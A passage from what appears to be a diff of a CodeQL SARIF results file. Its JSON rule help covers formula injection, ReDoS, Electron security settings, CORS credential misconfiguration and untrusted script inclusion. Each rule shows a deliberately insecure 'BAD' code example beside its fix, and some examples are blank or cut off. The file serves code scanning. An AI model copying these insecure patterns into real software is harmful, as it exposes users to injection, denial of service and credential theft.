[`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) 
may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" 
: "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "codeql/javascript-queries", + "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "notifications" : [ { + "id" : "js/diagnostics/extraction-errors", + "name" : "js/diagnostics/extraction-errors", + "shortDescription" : { + "text" : "Extraction errors" + }, + "fullDescription" : { + "text" : "List all extraction errors for files in the source code directory." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "description" : "List all extraction errors for files in the source code directory.", + "id" : "js/diagnostics/extraction-errors", + "kind" : "diagnostic", + "name" : "Extraction errors" + } + }, { + "id" : "js/diagnostics/successfully-extracted-files", + "name" : "js/diagnostics/successfully-extracted-files", + "shortDescription" : { + "text" : "Successfully extracted files" + }, + "fullDescription" : { + "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." 
+ }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "successfully-extracted-files" ], + "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "id" : "js/diagnostics/successfully-extracted-files", + "kind" : "diagnostic", + "name" : "Successfully extracted files" + } + } ], + "rules" : [ { + "id" : "js/polynomial-redos", + "name" : "js/polynomial-redos", + "shortDescription" : { + "text" : "Polynomial regular expression used on uncontrolled data" + }, + "fullDescription" : { + "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", + "id" : "js/polynomial-redos", + "kind" : "path-problem", + "name" : "Polynomial regular expression used on uncontrolled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/redos", + "name" : "js/redos", + "shortDescription" : { + "text" : "Inefficient regular expression" + }, + "fullDescription" : { + "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. 
Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", + "id" : "js/redos", + "kind" : "problem", + "name" : "Inefficient regular expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/disabling-electron-websecurity", + "name" : "js/disabling-electron-websecurity", + "shortDescription" : { + "text" : "Disabling Electron webSecurity" + }, + "fullDescription" : { + "text" : "Disabling webSecurity can cause critical security vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", + "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. 
Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], + "description" : "Disabling webSecurity can cause critical security vulnerabilities.", + "id" : "js/disabling-electron-websecurity", + "kind" : "problem", + "name" : "Disabling Electron webSecurity", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/enabling-electron-insecure-content", + "name" : "js/enabling-electron-insecure-content", + "shortDescription" : { + "text" : "Enabling Electron allowRunningInsecureContent" + }, + "fullDescription" : { + "text" : "Enabling allowRunningInsecureContent can allow remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", + "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], + "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", + "id" : "js/enabling-electron-insecure-content", + "kind" : "problem", + "name" : "Enabling Electron allowRunningInsecureContent", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cors-misconfiguration-for-credentials", + "name" : "js/cors-misconfiguration-for-credentials", + "shortDescription" : { + "text" : "CORS misconfiguration for credentials transfer" + }, + "fullDescription" : { + "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", + "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], + "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", + "id" : "js/cors-misconfiguration-for-credentials", + "kind" : "path-problem", + "name" : "CORS misconfiguration for credentials transfer", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/functionality-from-untrusted-source", + "name" : "js/functionality-from-untrusted-source", + "shortDescription" : { + "text" : "Inclusion of functionality from an untrusted source" + }, + "fullDescription" : { + "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. 
When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", + "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. 
When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). 
Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-830" ], + "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", + "id" : "js/functionality-from-untrusted-source", + "kind" : "problem", + "name" : "Inclusion of functionality from an untrusted source", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : 